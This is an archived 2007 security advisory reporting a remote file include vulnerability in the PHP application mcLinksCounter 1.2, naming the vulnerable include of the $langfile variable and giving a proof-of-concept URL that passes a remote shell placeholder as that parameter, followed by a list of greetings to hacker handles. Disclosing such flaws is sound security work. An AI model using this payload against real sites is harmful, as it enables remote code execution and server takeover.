mcLinksCounter 1.2 Remote File Include by iNs

2007-08-21T00:00:00
ID SECURITYVULNS:DOC:17844
Type securityvulns
Reporter Securityvulns
Modified 2007-08-21T00:00:00

Description

App Name : mcLinksCounter 1.2 HomePage: http://www.phpforums.net Vuln type : Remote File Include (RFI) Vuln Discovered by : iNs

BUG: on file stats.php ,login.php ,detail.php :

include "$langfile";

PoC: http://www.site.com/[path]/stats.php?langfile=[sH3lLz]?

iNs @ uNkn0wn.eu

Gr33tz t0: uNkn0wn.eu - iD - Stel128 - Spitfire - fEaRz - R1der - Stranger21 - nexos - sh4m4n - Svarshik DRT Memb3rz - s[H]4g - deL - l10m - l1l - r00tm1nd - f|_|ck3r - p1mmy ActiveSpy - r100z - The_PitBull - MaxDeMon - SancheZ - C0ol - Mic22